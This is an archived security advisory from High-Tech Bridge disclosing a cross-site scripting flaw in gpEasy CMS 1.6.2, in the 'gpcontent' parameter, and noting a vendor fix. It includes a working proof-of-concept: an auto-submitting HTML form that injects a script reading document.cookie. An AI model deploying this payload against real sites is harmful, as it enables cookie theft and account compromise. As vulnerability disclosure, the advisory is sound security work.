[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS vulnerability in gpEasy CMS



Vulnerability ID: HTB22370
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_gpeasy_cms.html
Product: gpEasy CMS
Vendor: gpeasy
Vulnerable Version: 1.6.2 and Probably Prior Versions
Vendor Notification: 05 May 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application. 

The vulnerability exists due to failure in the "include/tool/editing_files.php" script to properly sanitize user-supplied input in "gpcontent" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:


<form method="POST" action="http://example.com/index.php/Home"; name="myfrm">
<input type="hidden" name="cmd" value='save'>
<input type="hidden" name="gpcontent" value='text"><script>alert(document.cookie)</script>'>
</form>
<script>
document.myfrm.submit();
</script>


Solution: Upgrade to the most recent verison